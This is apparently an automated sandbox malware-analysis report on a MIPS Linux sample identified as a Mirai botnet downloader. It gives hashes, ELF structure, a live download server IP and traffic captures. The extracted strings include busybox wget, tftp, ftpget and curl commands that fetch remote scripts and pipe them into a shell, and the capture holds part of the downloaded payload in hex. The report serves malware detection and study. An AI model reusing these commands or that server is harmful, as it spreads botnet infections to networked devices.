Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.mpsl.elf

Overview

General Information

Sample name:dlr.mpsl.elf
Analysis ID:1579208
MD5:bcf24c32435f11fa7a75047b9ae32970
SHA1:7024acc8c2b09ffad2fa57f5dd74a4618ecb8b7d
SHA256:73db48ac0a40f6cb3d922d1fe43b651b59b5503b2afa667adcf86ab9bd48605a
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579208
Start date and time:2024-12-21 04:41:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.mpsl.elf
Detection:MAL
Classification:mal56.troj.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Command:/tmp/dlr.mpsl.elf
PID:5430
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
NIGGY
RAY
Standard Error:
  • system is lnxubuntu20
  • dlr.mpsl.elf (PID: 5430, Parent: 5354, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/dlr.mpsl.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
/tmp/GalaxyJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: dlr.mpsl.elfReversingLabs: Detection: 39%
    Source: Galaxy.12.drString: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
    Source: global trafficHTTP traffic detected: GET /mpsl HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
    Source: global trafficHTTP traffic detected: GET /mpsl HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
    Source: Galaxy.12.drString found in binary or memory: http:///curl.sh
    Source: Galaxy.12.drString found in binary or memory: http:///wget.sh
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal56.troj.linELF@0/1@0/0
    Source: /tmp/dlr.mpsl.elf (PID: 5430)File written: /tmp/GalaxyJump to dropped file
    Source: /tmp/dlr.mpsl.elf (PID: 5430)Queries kernel information via 'uname': Jump to behavior
    Source: dlr.mpsl.elf, 5430.1.000055e1d80f2000.000055e1d8179000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
    Source: dlr.mpsl.elf, 5430.1.000055e1d80f2000.000055e1d8179000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
    Source: dlr.mpsl.elf, 5430.1.00007ffcefab0000.00007ffcefad1000.rw-.sdmpBinary or memory string: 4x86_64/usr/bin/qemu-mipsel/tmp/dlr.mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.mpsl.elf
    Source: dlr.mpsl.elf, 5430.1.00007ffcefab0000.00007ffcefad1000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: /tmp/Galaxy, type: DROPPED

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: /tmp/Galaxy, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    Path InterceptionDirect Volume AccessOS Credential Dumping11
    Security Software Discovery
    Remote ServicesData from Local System1
    Non-Application Layer Protocol
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    dlr.mpsl.elf39%ReversingLabsLinux.Backdoor.Mirai
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http:///wget.shGalaxy.12.drfalse
      high
      http:///curl.shGalaxy.12.drfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        37.44.238.94
        unknownFrance
        49434HARMONYHOSTING-ASFRfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        37.44.238.94dlr.arm6.elfGet hashmaliciousUnknownBrowse
        • /arm6
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        HARMONYHOSTING-ASFRdlr.arm6.elfGet hashmaliciousUnknownBrowse
        • 37.44.238.94
        8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • 37.44.238.250
        roze.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 37.44.238.73
        roze.armv4.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 37.44.238.73
        roze.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 37.44.238.73
        roze.mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 37.44.238.73
        roze.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 37.44.238.73
        roze.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 37.44.238.73
        roze.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 37.44.238.73
        roze.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
        • 37.44.238.73
        No context
        No context
        Process:/tmp/dlr.mpsl.elf
        File Type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
        Category:dropped
        Size (bytes):105780
        Entropy (8bit):5.556320927280351
        Encrypted:false
        SSDEEP:1536:HsWsALpAiROftIQmPU3TYDGptvEjmFGSZGGiX+L9jIGjn7sVLni8VRG:HsWsAdAVftWksj6GSlqesVLnif
        MD5:A34FB1C88834565461D7F071CFA60012
        SHA1:87CBE20971482D8D191D762B747F65A62AEBB74C
        SHA-256:18C750674DA98A57830810E82A63EED6873BB5C390B0CCFCA92863AB2CFD6201
        SHA-512:DCDF9FDA598CA14AA01E97C81E129A424C1957CC6C1DF51260247B8A25A300ADD7CC8A8B99CF7323CE5F9D95B7674DF84FE6FFA155D10E5AF2E1D82E5F4CDA74
        Malicious:true
        Yara Hits:
        • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/Galaxy, Author: Joe Security
        Reputation:low
        Preview:.ELF....................`.@.4...........4. ...(...............@...@...........................E...E.....H\..........Q.td...............................<...'!......'.......................<...'!... .........9'.. ........................<...'!...$........j9'.. ......................... ..'...<...'!......' ........................".......@......................Y....... ...B$.. .............Y....... ...B$..........@....$.............. ....$.......$.". ...............(..'...<...'!......'...........................$..@...$.. ...............................@....$.. ........... . ..'............ ..'....!..............<D..'!...!...(..........'...$$.....'........................P......... ............................<...'!......'0...,...(...$... ...................!...!......0...0H..... ....$......P.......@.....0...,...(...$... ...............8..'.......... ...........P.......@.........L..... ....................... .........! @.8......... ....$........(......... .! ..T......... .........
        File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
        Entropy (8bit):4.719202245810007
        TrID:
        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
        File name:dlr.mpsl.elf
        File size:2'016 bytes
        MD5:bcf24c32435f11fa7a75047b9ae32970
        SHA1:7024acc8c2b09ffad2fa57f5dd74a4618ecb8b7d
        SHA256:73db48ac0a40f6cb3d922d1fe43b651b59b5503b2afa667adcf86ab9bd48605a
        SHA512:359c35992c10b1b70407785ec367d37e00120fba132c91179178ad2cff772404b4ac4173a088f272de22ceaa65cc5ba73e03eb07559e66698a345c27db95ffc8
        SSDEEP:24:uY23H/ki9mpHRMixZuDa9mCt5BJL4mmlZ9GpeIgO/qM+UTK8mKUlu/OT+wFLCdXa:kff2XnuDW3B6df9HOScTLmPkOTNFSXZ
        TLSH:7641121E6F801F37DD66CC36054B275139CC842BA16A63916334E960BD3E605A7D38A8
        File Content Preview:.ELF......................@.4...........4. ...(...............@...@.@...@...............@...@.D.@.D.T...p...........Q.td...........................................0.,...&..% .....0...0% ...2..%0...".....0.......0.....6..%.C.%0......%.F....<D..'!...\...!(.

        ELF header

        Class:ELF32
        Data:2's complement, little endian
        Version:1 (current)
        Machine:MIPS R3000
        Version Number:0x1
        Type:EXEC (Executable file)
        OS/ABI:UNIX - System V
        ABI Version:0
        Entry Point Address:0x4004e4
        Flags:0x1007
        ELF Header Size:52
        Program Header Offset:52
        Program Header Size:32
        Number of Program Headers:3
        Section Header Offset:1736
        Section Header Size:40
        Number of Section Headers:7
        Header String Table Index:6
        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
        NULL0x00x00x00x00x0000
        .textPROGBITS0x4000a00xa00x5600x00x6AX0016
        .rodataPROGBITS0x4006000x6000x400x10x32AMS004
        .gotPROGBITS0x4406400x6400x540x40x10000003WAp0016
        .bssNOBITS0x4406a00x6940x100x00x3WA0016
        .mdebug.abi32PROGBITS0x480x6940x00x00x0001
        .shstrtabSTRTAB0x00x6940x310x00x0001
        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
        LOAD0x00x4000000x4000000x6400x6405.01150x5R E0x10000.text .rodata
        LOAD0x6400x4406400x4406400x540x702.61250x6RW 0x10000.got .bss
        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
        TimestampSource PortDest PortSource IPDest IP
        Dec 21, 2024 04:41:57.594425917 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:57.713941097 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:57.714531898 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:57.715764999 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:57.835279942 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.984900951 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.985050917 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.985088110 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.985126019 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.985176086 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.985208988 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.985209942 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:58.985209942 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:58.985209942 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:58.985209942 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:58.985244036 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.985266924 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:58.985266924 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:58.985316992 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:58.985362053 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.985415936 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.985423088 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:58.985456944 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:58.985471010 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:58.985500097 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.105078936 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.105125904 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.105324030 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.105324030 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.177175045 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.177196980 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.177450895 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.177489996 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.179574013 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.179641962 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.179676056 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.179732084 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.188123941 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.188261032 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.189321995 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.196413994 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.196556091 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.197837114 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.204797029 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.204921007 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.206218004 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.213253021 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.213325024 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.214569092 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.221637964 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.221785069 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.223303080 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.230038881 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.230170965 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.230294943 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.238470078 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.238555908 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.239094019 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.246906042 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.246964931 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.247807980 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.254515886 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.254581928 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.254806995 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.296961069 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.340367079 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.369425058 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.369534969 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.370306015 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.371803999 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.371891975 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.372122049 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.375767946 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.375828028 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.377392054 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.380825996 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.380842924 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.380966902 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.385816097 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.385865927 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.386615038 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.390480995 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.390568972 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.391802073 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.395246029 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.395360947 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.397058010 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.400085926 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.400103092 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.400587082 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.404711008 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.404781103 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.405724049 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.409499884 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.409516096 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.410698891 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.414226055 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.414475918 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.415685892 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.419023037 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.419097900 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.420643091 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.423741102 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.423866987 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.423969030 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.447158098 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.496920109 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.496943951 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.498496056 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.511257887 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.511337042 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.511523962 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.525202036 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.525230885 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.526088953 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.540122986 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.540215969 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.540765047 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.566729069 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.566776991 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.566930056 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.568864107 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.568983078 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.570233107 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.573271036 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.573395014 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.573523998 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.578042984 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.578061104 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.578438997 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.582081079 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.582195997 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.583348989 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.586431026 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.586642981 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.590821981 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.590903044 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.628336906 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.697951078 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.697985888 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.699485064 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.778052092 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.897568941 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.897842884 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.899471998 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.899632931 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.899643898 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.903337955 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.903419018 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.903680086 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:41:59.907227039 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.907290936 CET804125637.44.238.94192.168.2.13
        Dec 21, 2024 04:41:59.907716036 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:42:01.218712091 CET4125680192.168.2.1337.44.238.94
        Dec 21, 2024 04:42:01.338323116 CET804125637.44.238.94192.168.2.13
        Session IDSource IPSource PortDestination IPDestination Port
        0192.168.2.134125637.44.238.9480
        TimestampBytes transferredDirectionData
        Dec 21, 2024 04:41:57.715764999 CET46OUTGET /mpsl HTTP/1.0
        Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00
        Data Ascii: RAY
        Dec 21, 2024 04:41:58.984900951 CET712INHTTP/1.0 200 OK
        Accept-Ranges: bytes
        Content-Length: 105780
        Content-Type: application/octet-stream
        Last-Modified: Sat, 21 Dec 2024 03:10:52 GMT
        Date: Sat, 21 Dec 2024 03:41:58 GMT
        Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 08 00 01 00 00 00 60 02 40 00 34 00 00 00 04 9b 01 00 07 10 00 00 34 00 20 00 03 00 28 00 0e 00 0d 00 01 00 00 00 00 00 00 00 00 00 40 00 00 00 40 00 90 8c 01 00 90 8c 01 00 05 00 00 00 00 00 01 00 01 00 00 00 00 90 01 00 00 90 45 00 00 90 45 00 a0 0a 00 00 48 5c 00 00 06 00 00 00 00 00 01 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 06 00 1c 3c 1c 14 9c 27 21 e0 99 03 e0 ff bd 27 10 00 bc af 1c 00 bf af 18 00 bc af 01 00 11 04 00 00 00 00 06 00 1c 3c f8 13 9c 27 21 e0 9f 03 20 80 99 8f 00 00 00 00 dc 01 39 27 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 01 00 11 04 00 00 00 00 06 00 1c 3c c8 13 9c 27 21 e0 9f 03 24 80 99 8f 00 00 00 00 80 6a 39 27 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 1c 00 bf 8f 00 00 00 00 08 00 e0 03 20 00 bd 27 06 00 1c 3c 90 13 9c 27 21 e0 99 03 d8 ff bd 27 20 00 bf af 1c 00 b1 af 18 00 b0 af 10 00 bc af 18 80 91 8f 00 00 00 00 d0 9a 22 92 00 00 00 00 1d 